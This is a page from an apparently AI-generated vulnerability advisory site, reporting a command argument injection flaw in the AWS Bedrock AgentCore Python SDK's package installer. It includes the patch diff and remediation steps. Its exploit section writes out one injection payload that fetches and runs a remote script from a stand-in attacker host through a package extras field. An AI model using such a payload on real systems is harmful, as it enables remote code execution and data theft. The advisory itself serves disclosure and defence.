CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-16796

CVE-2026-16796: Command Argument Injection in AWS Bedrock AgentCore SDK

Alon Barad
Alon Barad
Software Engineer

Jul 25, 2026·5 min read·78 visits

Executive Summary (TL;DR)

A weakly validated package extras regex in bedrock-agentcore allows command execution inside the Code Interpreter sandbox via crafted package install requests.

An argument injection vulnerability in the AWS Bedrock AgentCore Python SDK allows authenticated users to execute arbitrary commands inside the Code Interpreter sandbox container via crafted Python package specifiers containing shell metacharacters.

Vulnerability Overview

The AWS Bedrock AgentCore Python SDK (bedrock-agentcore) exposes helper tools to manage the Bedrock Agent environment. Among these, the CodeInterpreter tool allows Python agents to run in a secure, isolated sandbox environment to execute dynamically generated code blocks. To facilitate third-party dependency installation inside this sandbox, the SDK provides an install_packages() interface that wraps the standard Python pip utility.

Because the sandbox must dynamically download packages on demand, it relies on system-level command execution to trigger the pip install binary. The vulnerability exists within this installation flow, specifically when processing PEP 508 "extras" specifiers inside the requested package strings. The library failed to restrict the input format adequately before executing the constructed command within the system shell.

An attacker who has access to supply package arguments to the CodeInterpreter workspace can inject shell metacharacters. These metacharacters execute arbitrary code under the authorization context of the sandbox container, compromising the integrity of the isolated session.

Root Cause Analysis

The core of the vulnerability lies in src/bedrock_agentcore/tools/code_interpreter_client.py within the install_packages() method. Prior to validation, the library attempted to match package names against an internal regular expression designed to enforce valid package naming conventions.

VALID_PACKAGE_NAME = re.compile(
    r"^[a-zA-Z0-9]([a-zA-Z0-9._-]*[a-zA-Z0-9])?(\[.*\])?(==|>=|<=|!=|~=|>|<)?[a-zA-Z0-9.*]*$"
)

The catastrophic structural flaw in this pattern resides in the capture group meant to identify package extras: (\[.*\])?. Because the regex engine utilizes the wildcard pattern .* greedily within the square brackets, it accepts any sequence of character inputs of arbitrary length. This greedy matching effectively invalidates the defensive properties of the regular expression.

Furthermore, the system executed the resulting command via a shell environment rather than spawning a direct subprocess with isolated arguments. This processing approach meant that any metacharacters containing shell instructions—such as $(), backticks, or semicolons—were evaluated directly by the underlying OS shell rather than being parsed as safe string arguments.

Code Diff and Remediation Analysis

The security defect was resolved in commit 3c4b4ee6b8730e6313a82c743ac37dbcc1c21cdb by tightening the validation regular expression and implementing POSIX shell escaping.

@@ -6,6 +6,7 @@
 
 import logging
 import re
+import shlex
 import uuid
 from contextlib import contextmanager
 from typing import Any, Dict, Generator, List, Optional, Union
@@ -20,8 +21,11 @@
 
 DEFAULT_IDENTIFIER = "aws.codeinterpreter.v1"
 
+# Allowlist for pip package specifiers. The extras group is restricted to valid
+# extra names (comma-separated identifiers) rather than allowing arbitrary
+# characters, so only well-formed package specifiers are accepted.
 VALID_PACKAGE_NAME = re.compile(
-    r"^[a-zA-Z0-9]([a-zA-Z0-9._-]*[a-zA-Z0-9])?(\[.*\])?(==|>=|<=|!=|~=|>|<)?[a-zA-Z0-9.*]*$"
+    r"^[a-zA-Z0-9]([a-zA-Z0-9._-]*[a-zA-Z0-9])?(\[[a-zA-Z0-9._,\-]*\])?(==|>=|<=|!=|~=|>|<)?[a-zA-Z0-9.*]*$"
 )
 DEFAULT_TIMEOUT = 900
 
@@ -606,7 +610,8 @@ def install_packages(
             if not VALID_PACKAGE_NAME.match(pkg):
                 raise ValueError(f"Invalid package name: {pkg}")
 
-        packages_str = " ".join(packages)
+        # Quote each argument so it is passed to the command as a single literal token.
+        packages_str = " ".join(shlex.quote(pkg) for pkg in packages)
         upgrade_flag = "--upgrade " if upgrade else ""
         command = f"pip install {upgrade_flag}{packages_str}"

The modified pattern restricts the character set permitted within the bracket block to [a-zA-Z0-9._,\-]. This prevents any injection of shell expansion tokens. Additionally, executing shlex.quote(pkg) before concatenation ensures that all characters are escaped according to shell-quoting rules.

Exploit Methodology

An attacker with authorization to trigger package installation can supply a package name string structured to bypass the original validation regex while embedding a shell command execution payload.

To execute this exploit, the attacker crafts a payload utilizing the target dependency syntax: numpy[$(curl -s http://attacker.com/payload.sh | bash)]

The validation mechanism processes this payload as follows:

  1. The initial segment numpy matches the starting identifier.
  2. The extras segment [$(curl -s http://attacker.com/payload.sh | bash)] matches the greedy wildcard sequence \[.*\] because any characters within brackets are permitted.
  3. The SDK concatenates this payload directly into the final command block: pip install numpy[$(curl -s http://attacker.com/payload.sh | bash)].
  4. During command execution within the sandbox, the OS shell evaluates the command expansion block $() prior to invoking the pip binary.

Security Impact Assessment

The impact of this vulnerability is significant, carrying a CVSS v3.1 base score of 7.3. Because the execution takes place within the Code Interpreter container sandbox, the threat actor does not directly compromise the host hypervisor. However, the attacker gains full arbitrary code execution capabilities inside the container sandbox.

This execution capability allows attackers to exfiltrate session data, access temporary files, and read environmental tokens. In configurations where container network separation is weak, this execution point can be utilized to perform lateral port scans against internal AWS resources or adjacent microservices.

This flaw primarily risks data leakage and lateral movement. It can be chained with auxiliary sandbox escapes to threaten host operations.

Remediation and Defensive Strategies

The primary remediation for this vulnerability is upgrading the AWS Bedrock AgentCore Python SDK dependency to version 1.18.1 or higher. This upgrade implements both input validation hardening and structural shell argument quoting.

pip install --upgrade bedrock-agentcore>=1.18.1

If upgrading is not immediately possible, organizations should implement the following compensating controls:

  1. Apply egress firewalls to the Code Interpreter sandbox environment to prevent outbound traffic, neutralizing command control channels and data exfiltration routes.
  2. Regularly monitor execution logs inside Code Interpreter instances for instances of the pip install command containing illegal syntax characters inside brackets, such as $, ;, or &.

Official Patches

AWSRemediation commit implementing regex hardening and shlex.quote execution protection.

Fix Analysis (1)

Technical Appendix

CVSS Score
7.3/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
EPSS Probability
0.33%
Top 75% most exploited

Affected Systems

AWS Bedrock AgentCore Python SDK (bedrock-agentcore)

Affected Versions Detail

Product
Affected Versions
Fixed Version
bedrock-agentcore
AWS
>= 1.6.0, < 1.18.11.18.1
AttributeDetail
CWE IDCWE-88
Attack VectorNetwork
CVSS v3.17.3
EPSS Score0.00327
Exploit Statuspoc
KEV StatusNot Listed

MITRE ATT&CK Mapping

T1059Command and Scripting Interpreter
Execution
T1059.006Command and Scripting Interpreter: Python
Execution
CWE-88
Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

The product constructs an OS command using externally-influenced input, but it does not neutralize or incorrectly neutralizes argument delimiters, allowing an attacker to inject command-line arguments.

Vulnerability Timeline

Remediation patch commit submitted and bedrock-agentcore v1.18.1 released
2026-07-17
Public disclosure of CVE-2026-16796 and publication of advisory GHSA-j6g5-3hh3-pgw8
2026-07-23

References & Sources

  • [1]AWS Security Bulletin - 2026-065
  • [2]GitHub Security Advisory GHSA-j6g5-3hh3-pgw8
  • [3]Pull Request #581: Package verification improvement

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•44 minutes ago•CVE-2026-19481
7.5

CVE-2026-19481: Unauthenticated Remote Denial of Service via Prototype Lookup Crash in @fastify/busboy

A critical remote, unauthenticated Denial of Service (DoS) vulnerability in @fastify/busboy (<= 3.2.0) allows attackers to crash the Node.js process. By submitting a crafted multipart/form-data request with a header key matching an inherited property of Object.prototype (like __proto__ or constructor), the internal HeaderParser triggers a synchronous TypeError.

Amit Schendel
Amit Schendel
1 views•7 min read
•about 2 hours ago•GHSA-P23F-CM6Q-2QP8
8.6

GHSA-P23F-CM6Q-2QP8: Workspace Boundary Bypass and Arbitrary File Leak in SiYuan MCP

SiYuan is an open-source personal knowledge management system. Its Model Context Protocol (MCP) implementation within the asset.upload tool contains a path-traversal and workspace boundary bypass flaw. This allows remote AI models—acting on behalf of attackers via malicious prompts or documents—to import and read sensitive host-system files, such as private keys and system configurations, through absolute path inputs.

Alon Barad
Alon Barad
4 views•6 min read
•about 3 hours ago•GHSA-X8GV-G2G3-65FJ
8.2

CVE-2026-82234: Server-Side Request Forgery via DNS-Rebinding TOCTOU in SiYuan Kernel

An Server-Side Request Forgery (SSRF) vulnerability via DNS-Rebinding Time-of-Check to Time-of-Use (TOCTOU) has been discovered in SiYuan (思源笔记), an open-source personal knowledge management system. The flaw exists within the AI Agent tools http_request (util.HTTPRequest) and web_fetch (util.WebFetch) of the SiYuan Kernel, allowing unauthenticated remote attackers to bypass SSRF validation and access private internal services or cloud metadata endpoints.

Amit Schendel
Amit Schendel
4 views•7 min read
•about 4 hours ago•CVE-2026-104861
7.5

CVE-2026-104861: Quadratic-time Regular Expression Denial of Service in probe-image-size SVG Parser

An uncontrolled resource consumption vulnerability (CWE-1333 / CWE-400) exists in probe-image-size versions prior to 7.4.0. The SVG parser utilizes an unanchored, inefficient regular expression to find the SVG root tag, leading to catastrophic backtracking when handling malformed payloads. This blocks the single-threaded Node.js event loop, resulting in a complete denial of service.

Amit Schendel
Amit Schendel
5 views•9 min read
•about 5 hours ago•CVE-2026-10032
6.1

CVE-2026-10032: DOM-based Cross-Site Scripting (XSS) via window.open in Google @a2ui/web_core

CVE-2026-10032 is a DOM-based Cross-Site Scripting (XSS) vulnerability in Google's @a2ui/web_core Node.js library. The vulnerability is located within the openUrl utility function, which processes and opens dynamic URLs defined in layout configurations. Because the function fails to sanitize or validate the target URL scheme before passing it to the window.open browser sink, an attacker can specify a javascript: pseudo-protocol to execute arbitrary client-side script in the context of the host origin.

Amit Schendel
Amit Schendel
7 views•7 min read
•about 6 hours ago•CVE-2026-59944
6.1

CVE-2026-59944: Path Traversal and Symlink Resolution Bypass in Composer

CVE-2026-59944 is a path traversal and link-following vulnerability in Composer, the PHP dependency manager. This flaw allows malicious or compromised packages to bypass previous path-hardening protections and perform arbitrary filesystem operations outside of their designated installation directory, leading to unauthorized permission modifications or execution proxy creations.

Amit Schendel
Amit Schendel
7 views•6 min read